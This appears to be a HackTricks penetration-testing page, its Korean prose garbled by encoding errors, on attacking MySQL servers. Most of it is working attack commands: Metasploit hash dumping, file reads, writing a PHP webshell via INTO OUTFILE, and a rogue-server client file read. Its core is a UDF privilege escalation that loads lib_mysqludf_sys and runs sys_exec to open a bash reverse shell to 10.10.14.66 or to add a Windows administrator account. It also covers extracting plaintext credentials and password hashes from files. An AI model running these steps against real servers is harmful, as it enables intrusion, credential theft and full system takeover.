# 3306 - Pentesting Mysql
{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) \
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)** ](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
[**RootedCON**](https://www.rootedcon.com/)μ **μ€νμΈ**μμ κ°μ₯ κ΄λ ¨μ±μ΄ λμ μ¬μ΄λ² 보μ μ΄λ²€νΈμ΄λ©° **μ λ½**μμ κ°μ₯ μ€μν νμ¬ μ€ νλμ
λλ€. **κΈ°μ μ§μμ μ΄μ§νλ μ무**λ₯Ό κ°μ§κ³ μλ μ΄ νμλ λͺ¨λ λΆμΌμ κΈ°μ λ° μ¬μ΄λ² 보μ μ λ¬Έκ°λ€μ΄ λͺ¨μ΄λ λ¨κ±°μ΄ λ§λ¨μ μ₯μμ
λλ€.
{% embed url="https://www.rootedcon.com/" %}
## **κΈ°λ³Έ μ 보**
**MySQL**μ λΉμ©μ΄ λ€μ§ μλ μ€ν μμ€ **κ΄κ³ν λ°μ΄ν°λ² μ΄μ€ κ΄λ¦¬ μμ€ν
(RDBMS)**λ‘ μ€λͺ
λ μ μμ΅λλ€. **ꡬ쑰μ 쿼리 μΈμ΄ (SQL)**μμ μλνμ¬ λ°μ΄ν°λ² μ΄μ€μ κ΄λ¦¬ λ° μ‘°μμ κ°λ₯νκ² ν©λλ€.
**κΈ°λ³Έ ν¬νΈ:** 3306
```
3306/tcp open mysql
```
## **μ°κ²°**
### **λ‘컬**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
### μ격
```bash
mysql -h -u root
mysql -h -u root@localhost
```
## External Enumeration
μΌλΆ μ΄κ±° μμ
μ μ ν¨ν μ격 μ¦λͺ
μ΄ νμν©λλ€.
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
### [**λΈλ£¨νΈ ν¬μ€**](../generic-methodologies-and-resources/brute-force.md#mysql)
### μ΄μ§ λ°μ΄ν° μ°κΈ°
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```
## **MySQL λͺ
λ Ήμ΄**
```bash
show databases;
use ;
connect ;
show tables;
describe ;
show columns from ;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name=""
#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### MySQL κΆν μ΄κ±°
```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)
### MySQL νμΌ RCE
{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}
## MySQL ν΄λΌμ΄μΈνΈλ₯Ό ν΅ν μμ νμΌ μ½κΈ°
μ€μ λ‘, **load data local into a table** λͺ
λ Ήμ μ¬μ©νμ¬ **νμΌμ λ΄μ©μ** MySQL λλ MariaDB μλ²κ° **ν΄λΌμ΄μΈνΈμκ² μ½λλ‘ μμ²**νκ³ λ΄μ©μ μ μ‘ν©λλ€. **λ°λΌμ, μμ μ MySQL μλ²μ μ°κ²°νλλ‘ mysql ν΄λΌμ΄μΈνΈλ₯Ό μ‘°μν μ μλ€λ©΄, μμμ νμΌμ μ½μ μ μμ΅λλ€.**\
μ΄κ²μ λ€μμ μ¬μ©ν λμ λμμ
λλ€:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
(βlocalβ λ¨μ΄μ μ£Όλͺ©νμΈμ)\
βlocalβ μμ΄ λ€μκ³Ό κ°μ κ²°κ³Όλ₯Ό μ»μ μ μμ΅λλ€:
```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**μ΄κΈ° PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**μ΄ λ¬Έμμμλ 곡격μ λν μμ ν μ€λͺ
κ³Ό RCEλ‘ νμ₯νλ λ°©λ²μ λ³Ό μ μμ΅λλ€:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**μ¬κΈ°μμ 곡격 κ°μλ₯Ό μ°Ύμ μ μμ΅λλ€:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
β
ββ[**RootedCON**](https://www.rootedcon.com/)μ **μ€νμΈ**μμ κ°μ₯ κ΄λ ¨μ±μ΄ λμ μ¬μ΄λ² 보μ μ΄λ²€νΈμ΄λ©° **μ λ½**μμ κ°μ₯ μ€μν νμ¬ μ€ νλμ
λλ€. **κΈ°μ μ§μμ μ΄μ§νλ μ무**λ₯Ό κ°μ§κ³ , μ΄ μ»¨κ·Έλ μ€λ λͺ¨λ λΆμΌμ κΈ°μ λ° μ¬μ΄λ² 보μ μ λ¬Έκ°λ€μ΄ λͺ¨μ΄λ λ¨κ±°μ΄ λ§λ¨μ μ₯μμ
λλ€.
{% embed url="https://www.rootedcon.com/" %}
## POST
### Mysql μ¬μ©μ
mysqlμ΄ **root**λ‘ μ€νλκ³ μλ€λ©΄ λ§€μ° ν₯λ―Έλ‘μΈ κ²μ
λλ€:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### mysqld.cnfμ μνν μ€μ
MySQL μλΉμ€μ ꡬμ±μμ λ€μν μ€μ μ΄ μ¬μ©λμ΄ μ΄μ λ° λ³΄μ μ‘°μΉλ₯Ό μ μν©λλ€:
* **`user`** μ€μ μ MySQL μλΉμ€κ° μ€νλ μ¬μ©μ μ§μ μ μ¬μ©λ©λλ€.
* **`password`**λ MySQL μ¬μ©μμ κ΄λ ¨λ λΉλ°λ²νΈλ₯Ό μ€μ νλ λ° μ¬μ©λ©λλ€.
* **`admin_address`**λ κ΄λ¦¬ λ€νΈμν¬ μΈν°νμ΄μ€μμ TCP/IP μ°κ²°μ μμ νλ IP μ£Όμλ₯Ό μ§μ ν©λλ€.
* **`debug`** λ³μλ λ‘κ·Έ λ΄μ λ―Όκ°ν μ 보λ₯Ό ν¬ν¨νμ¬ νμ¬ λλ²κΉ
ꡬμ±μ λνλ
λλ€.
* **`sql_warnings`**λ κ²½κ³ κ° λ°μν λ λ¨μΌ ν INSERT λ¬Έμ λν μ 보 λ¬Έμμ΄μ΄ μμ±λλμ§ κ΄λ¦¬νλ©°, λ‘κ·Έ λ΄μ λ―Όκ°ν λ°μ΄ν°λ₯Ό ν¬ν¨ν©λλ€.
* **`secure_file_priv`**λ 보μμ κ°ννκΈ° μν΄ λ°μ΄ν° κ°μ Έμ€κΈ° λ° λ΄λ³΄λ΄κΈ° μμ
μ λ²μλ₯Ό μ νν©λλ€.
### κΆν μμΉ
```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password= -e "SELECT * FROM mysql.user;"
# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh
```
### Privilege Escalation via library
λ§μ½ **mysql μλ²κ° root** (λλ λ λμ κΆνμ κ°μ§ λ€λ₯Έ μ¬μ©μ)λ‘ μ€νλκ³ μλ€λ©΄, λͺ
λ Ήμ μ€ννλλ‘ λ§λ€ μ μμ΅λλ€. μ΄λ₯Ό μν΄μλ **μ¬μ©μ μ μ ν¨μ**λ₯Ό μ¬μ©ν΄μΌ ν©λλ€. κ·Έλ¦¬κ³ μ¬μ©μ μ μ ν¨μλ₯Ό λ§λ€κΈ° μν΄μλ mysqlμ΄ μ€νλκ³ μλ OSμ λν **λΌμ΄λΈλ¬λ¦¬**κ° νμν©λλ€.
μ¬μ©ν μ
μ± λΌμ΄λΈλ¬λ¦¬λ sqlmapκ³Ό metasploit μμμ **`locate "*lib_mysqludf_sys*"`** λͺ
λ Ήμ΄λ₯Ό ν΅ν΄ μ°Ύμ μ μμ΅λλ€. **`.so`** νμΌμ **linux** λΌμ΄λΈλ¬λ¦¬μ΄κ³ , **`.dll`** νμΌμ **Windows** λΌμ΄λΈλ¬λ¦¬μ
λλ€. νμν κ²μ μ ννμΈμ.
λ§μ½ **κ·Έ λΌμ΄λΈλ¬λ¦¬λ€μ΄ μλ€λ©΄**, **μ°Ύμ보거λ**, μ΄ [**linux C μ½λ**](https://www.exploit-db.com/exploits/1518)λ₯Ό λ€μ΄λ‘λνμ¬ **linux μ·¨μ½ν λ¨Έμ μμμ μ»΄νμΌ**ν μ μμ΅λλ€:
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
μ΄μ λΌμ΄λΈλ¬λ¦¬κ° μμΌλ, νΉκΆ μ¬μ©μ(루νΈ?)λ‘ Mysqlμ λ‘κ·ΈμΈνκ³ λ€μ λ¨κ³λ₯Ό λ°λ₯΄μΈμ:
#### Linux
```sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
#### μλμ°
```sql
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
### MySQL μ격 μ¦λͺ
νμΌμμ μΆμΆνκΈ°
_/etc/mysql/debian.cnf_ λ΄λΆμμ **debian-sys-maint** μ¬μ©μμ λν **μΌλ° ν
μ€νΈ λΉλ°λ²νΈ**λ₯Ό μ°Ύμ μ μμ΅λλ€.
```bash
cat /etc/mysql/debian.cnf
```
λΉμ μ **μ΄ μ격 μ¦λͺ
μ μ¬μ©νμ¬ mysql λ°μ΄ν°λ² μ΄μ€μ λ‘κ·ΈμΈν μ μμ΅λλ€**.
νμΌ _/var/lib/mysql/mysql/user.MYD_ μμλ **MySQL μ¬μ©μλ€μ λͺ¨λ ν΄μ**(λ°μ΄ν°λ² μ΄μ€ λ΄ mysql.userμμ μΆμΆν μ μλ κ²λ€)κ° μμ΅λλ€_._
λ€μκ³Ό κ°μ΄ μΆμΆν μ μμ΅λλ€:
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### λ‘κΉ
νμ±ν
λ€μ μ€μ μ£Όμμ μ κ±°νμ¬ `/etc/mysql/my.cnf` λ΄μμ mysql 쿼리 λ‘κΉ
μ νμ±νν μ μμ΅λλ€:
![](<../.gitbook/assets/image (899).png>)
### μ μ©ν νμΌ
κ΅¬μ± νμΌ
* windows \*
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* λͺ
λ Ή κΈ°λ‘
* \~/.mysql.history
* λ‘κ·Έ νμΌ
* connections.log
* update.log
* common.log
## κΈ°λ³Έ MySQL λ°μ΄ν°λ² μ΄μ€/ν
μ΄λΈ
{% tabs %}
{% tab title="information_schema" %}
ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
USER\_PRIVILEGES\
VIEWS\
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS
{% endtab %}
{% tab title="mysql" %}
columns\_priv\
column\_stats\
db\
engine\_cost\
event\
func\
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
user
{% endtab %}
{% tab title="performance_schema" %}
accounts\
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
user\_variables\_by\_thread\
users\
variables\_by\_thread
{% endtab %}
{% tab title="sys" %}
host\_summary\
host\_summary\_by\_file\_io\
host\_summary\_by\_file\_io\_type\
host\_summary\_by\_stages\
host\_summary\_by\_statement\_latency\
host\_summary\_by\_statement\_type\
innodb\_buffer\_stats\_by\_schema\
innodb\_buffer\_stats\_by\_table\
innodb\_lock\_waits\
io\_by\_thread\_by\_latency\
io\_global\_by\_file\_by\_bytes\
io\_global\_by\_file\_by\_latency\
io\_global\_by\_wait\_by\_bytes\
io\_global\_by\_wait\_by\_latency\
latest\_file\_io\
memory\_by\_host\_by\_current\_bytes\
memory\_by\_thread\_by\_current\_bytes\
memory\_by\_user\_by\_current\_bytes\
memory\_global\_by\_current\_bytes\
memory\_global\_total\
metrics\
processlist\
ps\_check\_lost\_instrumentation\
schema\_auto\_increment\_columns\
schema\_index\_statistics\
schema\_object\_overview\
schema\_redundant\_indexes\
schema\_table\_lock\_waits\
schema\_table\_statistics\
schema\_table\_statistics\_with\_buffer\
schema\_tables\_with\_full\_table\_scans\
schema\_unused\_indexes\
session\
session\_ssl\_status\
statement\_analysis\
statements\_with\_errors\_or\_warnings\
statements\_with\_full\_table\_scans\
statements\_with\_runtimes\_in\_95th\_percentile\
statements\_with\_sorting\
statements\_with\_temp\_tables\
sys\_config\
user\_summary\
user\_summary\_by\_file\_io\
user\_summary\_by\_file\_io\_type\
user\_summary\_by\_stages\
user\_summary\_by\_statement\_latency\
user\_summary\_by\_statement\_type\
version\
wait\_classes\_global\_by\_avg\_latency\
wait\_classes\_global\_by\_latency\
waits\_by\_host\_by\_latency\
waits\_by\_user\_by\_latency\
waits\_global\_by\_latency\
x$host\_summary\
x$host\_summary\_by\_file\_io\
x$host\_summary\_by\_file\_io\_type\
x$host\_summary\_by\_stages\
x$host\_summary\_by\_statement\_latency\
x$host\_summary\_by\_statement\_type\
x$innodb\_buffer\_stats\_by\_schema\
x$innodb\_buffer\_stats\_by\_table\
x$innodb\_lock\_waits\
x$io\_by\_thread\_by\_latency\
x$io\_global\_by\_file\_by\_bytes\
x$io\_global\_by\_file\_by\_latency\
x$io\_global\_by\_wait\_by\_bytes\
x$io\_global\_by\_wait\_by\_latency\
x$latest\_file\_io\
x$memory\_by\_host\_by\_current\_bytes\
x$memory\_by\_thread\_by\_current\_bytes\
x$memory\_by\_user\_by\_current\_bytes\
x$memory\_global\_by\_current\_bytes\
x$memory\_global\_total\
x$processlist\
x$ps\_digest\_95th\_percentile\_by\_avg\_us\
x$ps\_digest\_avg\_latency\_distribution\
x$ps\_schema\_table\_statistics\_io\
x$schema\_flattened\_keys\
x$schema\_index\_statistics\
x$schema\_table\_lock\_waits\
x$schema\_table\_statistics\
x$schema\_table\_statistics\_with\_buffer\
x$schema\_tables\_with\_full\_table\_scans\
x$session\
x$statement\_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements\_with\_full\_table\_scans\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements\_with\_sorting\
x$statements\_with\_temp\_tables\
x$user\_summary\
x$user\_summary\_by\_file\_io\
x$user\_summary\_by\_file\_io\_type\
x$user\_summary\_by\_stages\
x$user\_summary\_by\_statement\_latency\
x$user\_summary\_by\_statement\_type\
x$wait\_classes\_global\_by\_avg\_latency\
x$wait\_classes\_global\_by\_latency\
x$waits\_by\_host\_by\_latency\
x$waits\_by\_user\_by\_latency\
x$waits\_global\_by\_latency
{% endtab %}
{% endtabs %}
## HackTricks μλ λͺ
λ Ή
```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
[**RootedCON**](https://www.rootedcon.com/)μ **μ€νμΈ**μμ κ°μ₯ κ΄λ ¨μ±μ΄ λμ μ¬μ΄λ² 보μ μ΄λ²€νΈμ΄λ©° **μ λ½**μμ κ°μ₯ μ€μν νμ¬ μ€ νλμ
λλ€. **κΈ°μ μ§μμ μ΄μ§νλ μ무**λ₯Ό κ°μ§κ³ , μ΄ μ»¨κ·Έλ μ€λ λͺ¨λ λΆμΌμ κΈ°μ λ° μ¬μ΄λ² 보μ μ λ¬Έκ°λ€μ΄ λͺ¨μ΄λ λ¨κ±°μ΄ λ§λ¨μ μ₯μμ
λλ€.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) \
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°: [**HackTricks Training GCP Red Team Expert (GRTE)** ](https://training.hacktricks.xyz/courses/grte)
HackTricks μ§μνκΈ°
* [**ꡬλ
κ³ν**](https://github.com/sponsors/carlospolop) νμΈνκΈ°!
* **π¬ [**λμ€μ½λ κ·Έλ£Ή**](https://discord.gg/hRep4RUj7f) λλ [**ν
λ κ·Έλ¨ κ·Έλ£Ή**](https://t.me/peass)μ μ°Έμ¬νκ±°λ **νΈμν°**μμ **νλ‘μ°**νμΈμ** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) λ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νμ 곡μ νμΈμ.**
{% endhint %}